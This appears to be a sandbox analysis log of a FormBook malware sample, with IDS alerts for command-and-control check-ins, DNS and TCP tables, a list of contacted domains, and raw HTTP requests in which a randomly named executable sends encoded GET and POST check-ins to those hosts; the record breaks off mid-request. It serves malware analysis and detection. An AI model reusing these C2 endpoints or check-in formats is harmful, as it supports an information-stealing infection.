                                                      2024-12-17T08:24:44.111502+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849719199.59.243.22780TCP
                                                      2024-12-17T08:24:46.802876+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849720199.59.243.22780TCP
                                                      2024-12-17T08:24:49.495303+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849721199.59.243.22780TCP
                                                      2024-12-17T08:24:59.858741+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.8497238.136.96.10680TCP
                                                      2024-12-17T08:25:02.518436+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.8497248.136.96.10680TCP
                                                      2024-12-17T08:25:05.230535+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.8497258.136.96.10680TCP
                                                      2024-12-17T08:25:14.760146+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.84972769.57.163.6480TCP
                                                      2024-12-17T08:25:17.424909+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.84972869.57.163.6480TCP
                                                      2024-12-17T08:25:20.112516+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.84972969.57.163.6480TCP
                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Dec 17, 2024 08:23:54.752136946 CET4970780192.168.2.8104.21.36.239
                                                      Dec 17, 2024 08:23:54.872462034 CET8049707104.21.36.239192.168.2.8
                                                      Dec 17, 2024 08:23:54.872621059 CET4970780192.168.2.8104.21.36.239
                                                      Dec 17, 2024 08:23:54.883296967 CET4970780192.168.2.8104.21.36.239
                                                      Dec 17, 2024 08:23:55.002963066 CET8049707104.21.36.239192.168.2.8
                                                      Dec 17, 2024 08:23:56.047632933 CET8049707104.21.36.239192.168.2.8
                                                      Dec 17, 2024 08:23:56.047899008 CET8049707104.21.36.239192.168.2.8
                                                      Dec 17, 2024 08:23:56.048027992 CET8049707104.21.36.239192.168.2.8
                                                      Dec 17, 2024 08:23:56.048068047 CET4970780192.168.2.8104.21.36.239
                                                      Dec 17, 2024 08:23:56.048068047 CET4970780192.168.2.8104.21.36.239
                                                      Dec 17, 2024 08:23:56.053194046 CET4970780192.168.2.8104.21.36.239
                                                      Dec 17, 2024 08:23:56.172950983 CET8049707104.21.36.239192.168.2.8
                                                      Dec 17, 2024 08:24:12.392018080 CET4970980192.168.2.8185.199.110.153
                                                      Dec 17, 2024 08:24:12.513477087 CET8049709185.199.110.153192.168.2.8
                                                      Dec 17, 2024 08:24:12.513552904 CET4970980192.168.2.8185.199.110.153
                                                      Dec 17, 2024 08:24:12.536931992 CET4970980192.168.2.8185.199.110.153
                                                      Dec 17, 2024 08:24:12.656645060 CET8049709185.199.110.153192.168.2.8
                                                      Dec 17, 2024 08:24:13.598678112 CET8049709185.199.110.153192.168.2.8
                                                      Dec 17, 2024 08:24:13.599071026 CET8049709185.199.110.153192.168.2.8
                                                      Dec 17, 2024 08:24:13.599131107 CET4970980192.168.2.8185.199.110.153
                                                      Dec 17, 2024 08:24:14.042710066 CET4970980192.168.2.8185.199.110.153
                                                      Dec 17, 2024 08:24:15.153767109 CET4971080192.168.2.8185.199.110.153
                                                      Dec 17, 2024 08:24:15.273643017 CET8049710185.199.110.153192.168.2.8
                                                      Dec 17, 2024 08:24:15.273727894 CET4971080192.168.2.8185.199.110.153
                                                      Dec 17, 2024 08:24:15.354027987 CET4971080192.168.2.8185.199.110.153
                                                      Dec 17, 2024 08:24:15.473786116 CET8049710185.199.110.153192.168.2.8
                                                      Dec 17, 2024 08:24:16.358285904 CET8049710185.199.110.153192.168.2.8
                                                      Dec 17, 2024 08:24:16.358696938 CET8049710185.199.110.153192.168.2.8
                                                      Dec 17, 2024 08:24:16.358783007 CET4971080192.168.2.8185.199.110.153
                                                      Dec 17, 2024 08:24:16.855467081 CET4971080192.168.2.8185.199.110.153
                                                      Dec 17, 2024 08:24:17.899297953 CET4971180192.168.2.8185.199.110.153
                                                      Dec 17, 2024 08:24:18.022190094 CET8049711185.199.110.153192.168.2.8
                                                      Dec 17, 2024 08:24:18.022315979 CET4971180192.168.2.8185.199.110.153
                                                      Dec 17, 2024 08:24:18.238291979 CET4971180192.168.2.8185.199.110.153
                                                      Dec 17, 2024 08:24:18.358045101 CET8049711185.199.110.153192.168.2.8
                                                      Dec 17, 2024 08:24:18.359952927 CET8049711185.199.110.153192.168.2.8
                                                      Dec 17, 2024 08:24:19.107601881 CET8049711185.199.110.153192.168.2.8
                                                      Dec 17, 2024 08:24:19.108146906 CET8049711185.199.110.153192.168.2.8
                                                      Dec 17, 2024 08:24:19.108223915 CET4971180192.168.2.8185.199.110.153
                                                      Dec 17, 2024 08:24:19.761940002 CET4971180192.168.2.8185.199.110.153
                                                      Dec 17, 2024 08:24:20.843888044 CET4971280192.168.2.8185.199.110.153
                                                      Dec 17, 2024 08:24:20.963660002 CET8049712185.199.110.153192.168.2.8
                                                      Dec 17, 2024 08:24:20.963768005 CET4971280192.168.2.8185.199.110.153
                                                      Dec 17, 2024 08:24:21.012799025 CET4971280192.168.2.8185.199.110.153
                                                      Dec 17, 2024 08:24:21.132621050 CET8049712185.199.110.153192.168.2.8
                                                      Dec 17, 2024 08:24:22.056040049 CET8049712185.199.110.153192.168.2.8
                                                      Dec 17, 2024 08:24:22.056219101 CET8049712185.199.110.153192.168.2.8
                                                      Dec 17, 2024 08:24:22.056415081 CET4971280192.168.2.8185.199.110.153
                                                      Dec 17, 2024 08:24:22.059992075 CET4971280192.168.2.8185.199.110.153
                                                      Dec 17, 2024 08:24:22.179698944 CET8049712185.199.110.153192.168.2.8
                                                      Dec 17, 2024 08:24:27.443810940 CET4971380192.168.2.8104.21.48.233
                                                      Dec 17, 2024 08:24:27.563714027 CET8049713104.21.48.233192.168.2.8
                                                      Dec 17, 2024 08:24:27.563858986 CET4971380192.168.2.8104.21.48.233
                                                      Dec 17, 2024 08:24:27.579830885 CET4971380192.168.2.8104.21.48.233
                                                      Dec 17, 2024 08:24:27.699820042 CET8049713104.21.48.233192.168.2.8
                                                      Dec 17, 2024 08:24:28.902829885 CET8049713104.21.48.233192.168.2.8
                                                      Dec 17, 2024 08:24:28.902859926 CET8049713104.21.48.233192.168.2.8
                                                      Dec 17, 2024 08:24:28.902939081 CET4971380192.168.2.8104.21.48.233
                                                      Dec 17, 2024 08:24:29.089771986 CET4971380192.168.2.8104.21.48.233
                                                      Dec 17, 2024 08:24:30.131122112 CET4971480192.168.2.8104.21.48.233
                                                      Dec 17, 2024 08:24:30.250921965 CET8049714104.21.48.233192.168.2.8
                                                      Dec 17, 2024 08:24:30.251035929 CET4971480192.168.2.8104.21.48.233
                                                      Dec 17, 2024 08:24:30.376171112 CET4971480192.168.2.8104.21.48.233
                                                      Dec 17, 2024 08:24:30.495910883 CET8049714104.21.48.233192.168.2.8
                                                      Dec 17, 2024 08:24:31.493892908 CET8049714104.21.48.233192.168.2.8
                                                      Dec 17, 2024 08:24:31.494168043 CET8049714104.21.48.233192.168.2.8
                                                      Dec 17, 2024 08:24:31.494240999 CET4971480192.168.2.8104.21.48.233
                                                      Dec 17, 2024 08:24:31.887335062 CET4971480192.168.2.8104.21.48.233
                                                      Dec 17, 2024 08:24:33.019906998 CET4971580192.168.2.8104.21.48.233
                                                      Dec 17, 2024 08:24:33.139580965 CET8049715104.21.48.233192.168.2.8
                                                      Dec 17, 2024 08:24:33.139764071 CET4971580192.168.2.8104.21.48.233
                                                      Dec 17, 2024 08:24:33.362102985 CET4971580192.168.2.8104.21.48.233
                                                      Dec 17, 2024 08:24:33.481904984 CET8049715104.21.48.233192.168.2.8
                                                      Dec 17, 2024 08:24:33.481916904 CET8049715104.21.48.233192.168.2.8
                                                      Dec 17, 2024 08:24:34.405495882 CET8049715104.21.48.233192.168.2.8
                                                      Dec 17, 2024 08:24:34.406332970 CET8049715104.21.48.233192.168.2.8
                                                      Dec 17, 2024 08:24:34.406389952 CET4971580192.168.2.8104.21.48.233
                                                      Dec 17, 2024 08:24:34.406416893 CET8049715104.21.48.233192.168.2.8
                                                      Dec 17, 2024 08:24:34.406460047 CET4971580192.168.2.8104.21.48.233
                                                      Dec 17, 2024 08:24:34.871057034 CET4971580192.168.2.8104.21.48.233
                                                      Dec 17, 2024 08:24:35.923181057 CET4971780192.168.2.8104.21.48.233
                                                      Dec 17, 2024 08:24:36.042957067 CET8049717104.21.48.233192.168.2.8
                                                      Dec 17, 2024 08:24:36.043051958 CET4971780192.168.2.8104.21.48.233
                                                      Dec 17, 2024 08:24:36.121577978 CET4971780192.168.2.8104.21.48.233
                                                      Dec 17, 2024 08:24:36.241345882 CET8049717104.21.48.233192.168.2.8
                                                      Dec 17, 2024 08:24:37.312887907 CET8049717104.21.48.233192.168.2.8
                                                      Dec 17, 2024 08:24:37.312948942 CET8049717104.21.48.233192.168.2.8
                                                      Dec 17, 2024 08:24:37.313138008 CET4971780192.168.2.8104.21.48.233
                                                      Dec 17, 2024 08:24:37.313174963 CET8049717104.21.48.233192.168.2.8
                                                      Dec 17, 2024 08:24:37.313247919 CET8049717104.21.48.233192.168.2.8
                                                      Dec 17, 2024 08:24:37.313292980 CET4971780192.168.2.8104.21.48.233
                                                      Dec 17, 2024 08:24:37.317955017 CET4971780192.168.2.8104.21.48.233
                                                      Dec 17, 2024 08:24:37.437657118 CET8049717104.21.48.233192.168.2.8
                                                      Dec 17, 2024 08:24:42.895433903 CET4971980192.168.2.8199.59.243.227
                                                      Dec 17, 2024 08:24:43.015381098 CET8049719199.59.243.227192.168.2.8
                                                      Dec 17, 2024 08:24:43.015486956 CET4971980192.168.2.8199.59.243.227
                                                      Dec 17, 2024 08:24:43.031739950 CET4971980192.168.2.8199.59.243.227
                                                      Dec 17, 2024 08:24:43.151606083 CET8049719199.59.243.227192.168.2.8
                                                      Dec 17, 2024 08:24:44.111365080 CET8049719199.59.243.227192.168.2.8
                                                      Dec 17, 2024 08:24:44.111434937 CET8049719199.59.243.227192.168.2.8
                                                      Dec 17, 2024 08:24:44.111447096 CET8049719199.59.243.227192.168.2.8
                                                      Dec 17, 2024 08:24:44.111501932 CET4971980192.168.2.8199.59.243.227
                                                      Dec 17, 2024 08:24:44.542886972 CET4971980192.168.2.8199.59.243.227
                                                      Dec 17, 2024 08:24:45.582958937 CET4972080192.168.2.8199.59.243.227
                                                      Dec 17, 2024 08:24:45.705693007 CET8049720199.59.243.227192.168.2.8
                                                      Dec 17, 2024 08:24:45.705795050 CET4972080192.168.2.8199.59.243.227
                                                      Dec 17, 2024 08:24:45.730436087 CET4972080192.168.2.8199.59.243.227
                                                      Dec 17, 2024 08:24:45.850517035 CET8049720199.59.243.227192.168.2.8
                                                      Dec 17, 2024 08:24:46.802655935 CET8049720199.59.243.227192.168.2.8
                                                      Dec 17, 2024 08:24:46.802707911 CET8049720199.59.243.227192.168.2.8
                                                      Dec 17, 2024 08:24:46.802742958 CET8049720199.59.243.227192.168.2.8
                                                      Dec 17, 2024 08:24:46.802875996 CET4972080192.168.2.8199.59.243.227
                                                      Dec 17, 2024 08:24:47.246131897 CET4972080192.168.2.8199.59.243.227
                                                      Dec 17, 2024 08:24:48.264929056 CET4972180192.168.2.8199.59.243.227
                                                      Dec 17, 2024 08:24:48.384836912 CET8049721199.59.243.227192.168.2.8
                                                      Dec 17, 2024 08:24:48.384916067 CET4972180192.168.2.8199.59.243.227
                                                      Dec 17, 2024 08:24:48.402513981 CET4972180192.168.2.8199.59.243.227
                                                      Dec 17, 2024 08:24:48.522228003 CET8049721199.59.243.227192.168.2.8
                                                      Dec 17, 2024 08:24:48.522432089 CET8049721199.59.243.227192.168.2.8
                                                      Dec 17, 2024 08:24:49.495121956 CET8049721199.59.243.227192.168.2.8
                                                      Dec 17, 2024 08:24:49.495171070 CET8049721199.59.243.227192.168.2.8
                                                      Dec 17, 2024 08:24:49.495302916 CET4972180192.168.2.8199.59.243.227
                                                      Dec 17, 2024 08:24:49.495467901 CET8049721199.59.243.227192.168.2.8
                                                      Dec 17, 2024 08:24:49.495575905 CET4972180192.168.2.8199.59.243.227
                                                      Dec 17, 2024 08:24:49.917773008 CET4972180192.168.2.8199.59.243.227
                                                      Dec 17, 2024 08:24:50.938226938 CET4972280192.168.2.8199.59.243.227
                                                      Dec 17, 2024 08:24:51.058221102 CET8049722199.59.243.227192.168.2.8
                                                      Dec 17, 2024 08:24:51.058528900 CET4972280192.168.2.8199.59.243.227
                                                      Dec 17, 2024 08:24:51.068139076 CET4972280192.168.2.8199.59.243.227
                                                      Dec 17, 2024 08:24:51.187900066 CET8049722199.59.243.227192.168.2.8
                                                      Dec 17, 2024 08:24:52.154082060 CET8049722199.59.243.227192.168.2.8
                                                      Dec 17, 2024 08:24:52.154126883 CET8049722199.59.243.227192.168.2.8
                                                      Dec 17, 2024 08:24:52.154161930 CET8049722199.59.243.227192.168.2.8
                                                      Dec 17, 2024 08:24:52.154279947 CET4972280192.168.2.8199.59.243.227
                                                      Dec 17, 2024 08:24:52.154279947 CET4972280192.168.2.8199.59.243.227
                                                      Dec 17, 2024 08:24:52.157569885 CET4972280192.168.2.8199.59.243.227
                                                      Dec 17, 2024 08:24:52.277264118 CET8049722199.59.243.227192.168.2.8
                                                      Dec 17, 2024 08:24:58.218080044 CET4972380192.168.2.88.136.96.106
                                                      Dec 17, 2024 08:24:58.338064909 CET80497238.136.96.106192.168.2.8
                                                      Dec 17, 2024 08:24:58.338149071 CET4972380192.168.2.88.136.96.106
                                                      Dec 17, 2024 08:24:58.354867935 CET4972380192.168.2.88.136.96.106
                                                      Dec 17, 2024 08:24:58.474607944 CET80497238.136.96.106192.168.2.8
                                                      Dec 17, 2024 08:24:59.858557940 CET80497238.136.96.106192.168.2.8
                                                      Dec 17, 2024 08:24:59.858684063 CET80497238.136.96.106192.168.2.8
                                                      Dec 17, 2024 08:24:59.858741045 CET4972380192.168.2.88.136.96.106
                                                      Dec 17, 2024 08:24:59.870963097 CET4972380192.168.2.88.136.96.106
                                                      Dec 17, 2024 08:25:00.892307997 CET4972480192.168.2.88.136.96.106
                                                      Dec 17, 2024 08:25:01.012176991 CET80497248.136.96.106192.168.2.8
                                                      Dec 17, 2024 08:25:01.012303114 CET4972480192.168.2.88.136.96.106
                                                      Dec 17, 2024 08:25:01.028673887 CET4972480192.168.2.88.136.96.106
                                                      Dec 17, 2024 08:25:01.148437977 CET80497248.136.96.106192.168.2.8
                                                      Dec 17, 2024 08:25:02.518285990 CET80497248.136.96.106192.168.2.8
                                                      Dec 17, 2024 08:25:02.518302917 CET80497248.136.96.106192.168.2.8
                                                      Dec 17, 2024 08:25:02.518435955 CET4972480192.168.2.88.136.96.106
                                                      Dec 17, 2024 08:25:02.561738968 CET4972480192.168.2.88.136.96.106
                                                      Dec 17, 2024 08:25:03.578110933 CET4972580192.168.2.88.136.96.106
                                                      Dec 17, 2024 08:25:03.697807074 CET80497258.136.96.106192.168.2.8
                                                      Dec 17, 2024 08:25:03.697927952 CET4972580192.168.2.88.136.96.106
                                                      Dec 17, 2024 08:25:03.714528084 CET4972580192.168.2.88.136.96.106
                                                      Dec 17, 2024 08:25:03.834295988 CET80497258.136.96.106192.168.2.8
                                                      Dec 17, 2024 08:25:03.834346056 CET80497258.136.96.106192.168.2.8
                                                      Dec 17, 2024 08:25:05.224736929 CET80497258.136.96.106192.168.2.8
                                                      Dec 17, 2024 08:25:05.230535030 CET4972580192.168.2.88.136.96.106
                                                      Dec 17, 2024 08:25:06.250129938 CET4972680192.168.2.88.136.96.106
                                                      Dec 17, 2024 08:25:06.369890928 CET80497268.136.96.106192.168.2.8
                                                      Dec 17, 2024 08:25:06.370124102 CET4972680192.168.2.88.136.96.106
                                                      Dec 17, 2024 08:25:06.384931087 CET4972680192.168.2.88.136.96.106
                                                      Dec 17, 2024 08:25:06.504961014 CET80497268.136.96.106192.168.2.8
                                                      Dec 17, 2024 08:25:07.905020952 CET80497268.136.96.106192.168.2.8
                                                      Dec 17, 2024 08:25:07.906656027 CET80497268.136.96.106192.168.2.8
                                                      Dec 17, 2024 08:25:07.906713009 CET4972680192.168.2.88.136.96.106
                                                      Dec 17, 2024 08:25:07.908958912 CET4972680192.168.2.88.136.96.106
                                                      Dec 17, 2024 08:25:08.029761076 CET80497268.136.96.106192.168.2.8
                                                      Dec 17, 2024 08:25:13.396624088 CET4972780192.168.2.869.57.163.64
                                                      Dec 17, 2024 08:25:13.516383886 CET804972769.57.163.64192.168.2.8
                                                      Dec 17, 2024 08:25:13.522147894 CET4972780192.168.2.869.57.163.64
                                                      Dec 17, 2024 08:25:13.540319920 CET4972780192.168.2.869.57.163.64
                                                      Dec 17, 2024 08:25:13.660011053 CET804972769.57.163.64192.168.2.8
                                                      Dec 17, 2024 08:25:14.760078907 CET804972769.57.163.64192.168.2.8
                                                      Dec 17, 2024 08:25:14.760101080 CET804972769.57.163.64192.168.2.8
                                                      Dec 17, 2024 08:25:14.760145903 CET4972780192.168.2.869.57.163.64
                                                      Dec 17, 2024 08:25:15.043716908 CET4972780192.168.2.869.57.163.64
                                                      Dec 17, 2024 08:25:16.062156916 CET4972880192.168.2.869.57.163.64
                                                      Dec 17, 2024 08:25:16.184531927 CET804972869.57.163.64192.168.2.8
                                                      Dec 17, 2024 08:25:16.184633017 CET4972880192.168.2.869.57.163.64
                                                      Dec 17, 2024 08:25:16.203038931 CET4972880192.168.2.869.57.163.64
                                                      Dec 17, 2024 08:25:16.336865902 CET804972869.57.163.64192.168.2.8
                                                      Dec 17, 2024 08:25:17.424590111 CET804972869.57.163.64192.168.2.8
                                                      Dec 17, 2024 08:25:17.424712896 CET804972869.57.163.64192.168.2.8
                                                      Dec 17, 2024 08:25:17.424909115 CET4972880192.168.2.869.57.163.64
                                                      Dec 17, 2024 08:25:17.727606058 CET4972880192.168.2.869.57.163.64
                                                      Dec 17, 2024 08:25:18.747458935 CET4972980192.168.2.869.57.163.64
                                                      Dec 17, 2024 08:25:18.867176056 CET804972969.57.163.64192.168.2.8
                                                      Dec 17, 2024 08:25:18.867321968 CET4972980192.168.2.869.57.163.64
                                                      Dec 17, 2024 08:25:18.882842064 CET4972980192.168.2.869.57.163.64
                                                      Dec 17, 2024 08:25:19.002890110 CET804972969.57.163.64192.168.2.8
                                                      Dec 17, 2024 08:25:19.002964973 CET804972969.57.163.64192.168.2.8
                                                      Dec 17, 2024 08:25:20.111902952 CET804972969.57.163.64192.168.2.8
                                                      Dec 17, 2024 08:25:20.112361908 CET804972969.57.163.64192.168.2.8
                                                      Dec 17, 2024 08:25:20.112515926 CET4972980192.168.2.869.57.163.64
                                                      Dec 17, 2024 08:25:20.387342930 CET4972980192.168.2.869.57.163.64
                                                      Dec 17, 2024 08:25:22.734334946 CET4973080192.168.2.869.57.163.64
                                                      Dec 17, 2024 08:25:22.856318951 CET804973069.57.163.64192.168.2.8
                                                      Dec 17, 2024 08:25:22.858345985 CET4973080192.168.2.869.57.163.64
                                                      Dec 17, 2024 08:25:22.866293907 CET4973080192.168.2.869.57.163.64
                                                      Dec 17, 2024 08:25:22.986785889 CET804973069.57.163.64192.168.2.8
                                                      Dec 17, 2024 08:25:24.122167110 CET804973069.57.163.64192.168.2.8
                                                      Dec 17, 2024 08:25:24.122288942 CET804973069.57.163.64192.168.2.8
                                                      Dec 17, 2024 08:25:24.122370005 CET4973080192.168.2.869.57.163.64
                                                      Dec 17, 2024 08:25:24.125339031 CET4973080192.168.2.869.57.163.64
                                                      Dec 17, 2024 08:25:24.245007038 CET804973069.57.163.64192.168.2.8
                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Dec 17, 2024 08:23:54.429620981 CET6486153192.168.2.81.1.1.1
                                                      Dec 17, 2024 08:23:54.743221998 CET53648611.1.1.1192.168.2.8
                                                      Dec 17, 2024 08:24:11.095530987 CET5146853192.168.2.81.1.1.1
                                                      Dec 17, 2024 08:24:12.204821110 CET5146853192.168.2.81.1.1.1
                                                      Dec 17, 2024 08:24:12.389413118 CET53514681.1.1.1192.168.2.8
                                                      Dec 17, 2024 08:24:12.389461994 CET53514681.1.1.1192.168.2.8
                                                      Dec 17, 2024 08:24:27.119842052 CET5812253192.168.2.81.1.1.1
                                                      Dec 17, 2024 08:24:27.440190077 CET53581221.1.1.1192.168.2.8
                                                      Dec 17, 2024 08:24:42.327884912 CET5002653192.168.2.81.1.1.1
                                                      Dec 17, 2024 08:24:42.892760038 CET53500261.1.1.1192.168.2.8
                                                      Dec 17, 2024 08:24:57.174262047 CET5809953192.168.2.81.1.1.1
                                                      Dec 17, 2024 08:24:58.168342113 CET5809953192.168.2.81.1.1.1
                                                      Dec 17, 2024 08:24:58.214732885 CET53580991.1.1.1192.168.2.8
                                                      Dec 17, 2024 08:24:58.305752039 CET53580991.1.1.1192.168.2.8
                                                      Dec 17, 2024 08:25:12.922311068 CET6179953192.168.2.81.1.1.1
                                                      Dec 17, 2024 08:25:13.393780947 CET53617991.1.1.1192.168.2.8
                                                      Dec 17, 2024 08:25:29.140902996 CET5924853192.168.2.81.1.1.1
                                                      Dec 17, 2024 08:25:30.140856981 CET53592481.1.1.1192.168.2.8
                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                      Dec 17, 2024 08:23:54.429620981 CET192.168.2.81.1.1.10x5dd6Standard query (0)www.goldbracelet.topA (IP address)IN (0x0001)false
                                                      Dec 17, 2024 08:24:11.095530987 CET192.168.2.81.1.1.10xbd21Standard query (0)www.pku-cs-cjw.topA (IP address)IN (0x0001)false
                                                      Dec 17, 2024 08:24:12.204821110 CET192.168.2.81.1.1.10xbd21Standard query (0)www.pku-cs-cjw.topA (IP address)IN (0x0001)false
                                                      Dec 17, 2024 08:24:27.119842052 CET192.168.2.81.1.1.10x3212Standard query (0)www.ausyva4.topA (IP address)IN (0x0001)false
                                                      Dec 17, 2024 08:24:42.327884912 CET192.168.2.81.1.1.10xd836Standard query (0)www.969-usedcar02.shopA (IP address)IN (0x0001)false
                                                      Dec 17, 2024 08:24:57.174262047 CET192.168.2.81.1.1.10x2c5Standard query (0)www.juewucangku.xyzA (IP address)IN (0x0001)false
                                                      Dec 17, 2024 08:24:58.168342113 CET192.168.2.81.1.1.10x2c5Standard query (0)www.juewucangku.xyzA (IP address)IN (0x0001)false
                                                      Dec 17, 2024 08:25:12.922311068 CET192.168.2.81.1.1.10x9009Standard query (0)www.startsomething.xyzA (IP address)IN (0x0001)false
                                                      Dec 17, 2024 08:25:29.140902996 CET192.168.2.81.1.1.10x2b8fStandard query (0)www.opro.vipA (IP address)IN (0x0001)false
                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                      Dec 17, 2024 08:23:54.743221998 CET1.1.1.1192.168.2.80x5dd6No error (0)www.goldbracelet.top104.21.36.239A (IP address)IN (0x0001)false
                                                      Dec 17, 2024 08:23:54.743221998 CET1.1.1.1192.168.2.80x5dd6No error (0)www.goldbracelet.top172.67.201.49A (IP address)IN (0x0001)false
                                                      Dec 17, 2024 08:24:12.389413118 CET1.1.1.1192.168.2.80xbd21No error (0)www.pku-cs-cjw.top187370.github.ioCNAME (Canonical name)IN (0x0001)false
                                                      Dec 17, 2024 08:24:12.389413118 CET1.1.1.1192.168.2.80xbd21No error (0)187370.github.io185.199.110.153A (IP address)IN (0x0001)false
                                                      Dec 17, 2024 08:24:12.389413118 CET1.1.1.1192.168.2.80xbd21No error (0)187370.github.io185.199.109.153A (IP address)IN (0x0001)false
                                                      Dec 17, 2024 08:24:12.389413118 CET1.1.1.1192.168.2.80xbd21No error (0)187370.github.io185.199.108.153A (IP address)IN (0x0001)false
                                                      Dec 17, 2024 08:24:12.389413118 CET1.1.1.1192.168.2.80xbd21No error (0)187370.github.io185.199.111.153A (IP address)IN (0x0001)false
                                                      Dec 17, 2024 08:24:12.389461994 CET1.1.1.1192.168.2.80xbd21No error (0)www.pku-cs-cjw.top187370.github.ioCNAME (Canonical name)IN (0x0001)false
                                                      Dec 17, 2024 08:24:12.389461994 CET1.1.1.1192.168.2.80xbd21No error (0)187370.github.io185.199.110.153A (IP address)IN (0x0001)false
                                                      Dec 17, 2024 08:24:12.389461994 CET1.1.1.1192.168.2.80xbd21No error (0)187370.github.io185.199.109.153A (IP address)IN (0x0001)false
                                                      Dec 17, 2024 08:24:12.389461994 CET1.1.1.1192.168.2.80xbd21No error (0)187370.github.io185.199.108.153A (IP address)IN (0x0001)false
                                                      Dec 17, 2024 08:24:12.389461994 CET1.1.1.1192.168.2.80xbd21No error (0)187370.github.io185.199.111.153A (IP address)IN (0x0001)false
                                                      Dec 17, 2024 08:24:27.440190077 CET1.1.1.1192.168.2.80x3212No error (0)www.ausyva4.top104.21.48.233A (IP address)IN (0x0001)false
                                                      Dec 17, 2024 08:24:27.440190077 CET1.1.1.1192.168.2.80x3212No error (0)www.ausyva4.top172.67.188.88A (IP address)IN (0x0001)false
                                                      Dec 17, 2024 08:24:42.892760038 CET1.1.1.1192.168.2.80xd836No error (0)www.969-usedcar02.shop199.59.243.227A (IP address)IN (0x0001)false
                                                      Dec 17, 2024 08:24:58.214732885 CET1.1.1.1192.168.2.80x2c5No error (0)www.juewucangku.xyz8.136.96.106A (IP address)IN (0x0001)false
                                                      Dec 17, 2024 08:24:58.305752039 CET1.1.1.1192.168.2.80x2c5No error (0)www.juewucangku.xyz8.136.96.106A (IP address)IN (0x0001)false
                                                      Dec 17, 2024 08:25:13.393780947 CET1.1.1.1192.168.2.80x9009No error (0)www.startsomething.xyz69.57.163.64A (IP address)IN (0x0001)false
                                                      Dec 17, 2024 08:25:30.140856981 CET1.1.1.1192.168.2.80x2b8fNo error (0)www.opro.vipoverdue.aliyun.comCNAME (Canonical name)IN (0x0001)false
                                                      Dec 17, 2024 08:25:30.140856981 CET1.1.1.1192.168.2.80x2b8fNo error (0)overdue.aliyun.com170.33.13.246A (IP address)IN (0x0001)false
                                                      • www.goldbracelet.top
                                                      • www.pku-cs-cjw.top
                                                      • www.ausyva4.top
                                                      • www.969-usedcar02.shop
                                                      • www.juewucangku.xyz
                                                      • www.startsomething.xyz
                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      0192.168.2.849707104.21.36.239805164C:\Program Files (x86)\HXuKNehwRCvCGVTvwbakJIecOePGhOvzkeSvzIpLOVeFCqeShBB\eYHtcsfFquWF.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 17, 2024 08:23:54.883296967 CET469OUTGET /3e00/?rPh=vcWi2Nuzfs8bFUYEQnXoBGbuOVlE2i7vXXwcNv5UqJ4W+nqlyarjJ+7bYKIWgHEnmSKdgKCrspLX0t5o9qCKhlhB0ucBfa9KdBCtjbE5oHHxOp6OdcL90Ef3I2JAzosFGA==&kVvpD=Bx4T HTTP/1.1
                                                      Host: www.goldbracelet.top
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                      Accept-Language: en-us
                                                      Connection: close
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729)
                                                      Dec 17, 2024 08:23:56.047632933 CET778INHTTP/1.1 403 Forbidden
                                                      Date: Tue, 17 Dec 2024 07:23:55 GMT
                                                      Content-Type: text/html
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      cf-cache-status: DYNAMIC
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6mWxFc3jlOg%2BYNF2eQSghdWdxAub%2BaemXWN69jXUCSYStI9a1MqFS0TCDLnIlE6vjkPrsB3zfff2TiTr8v6nXrtTfbHta%2FkIoGNTjOTGuDAY8kbcu1Mv0VyLy9N4d77mnqEJlvBMWQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 8f352ba9cd0d8c0f-EWR
                                                      alt-svc: h3=":443"; ma=86400
                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1795&min_rtt=1795&rtt_var=897&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=469&delivery_rate=0&cwnd=218&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                      Dec 17, 2024 08:23:56.047899008 CET157INData Raw: 39 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72
                                                      Data Ascii: 92<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      1192.168.2.849709185.199.110.153805164C:\Program Files (x86)\HXuKNehwRCvCGVTvwbakJIecOePGhOvzkeSvzIpLOVeFCqeShBB\eYHtcsfFquWF.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 17, 2024 08:24:12.536931992 CET733OUTPOST /k3hn/ HTTP/1.1
                                                      Host: www.pku-cs-cjw.top
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-us
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: max-age=0
                                                      Content-Length: 204
                                                      Connection: close
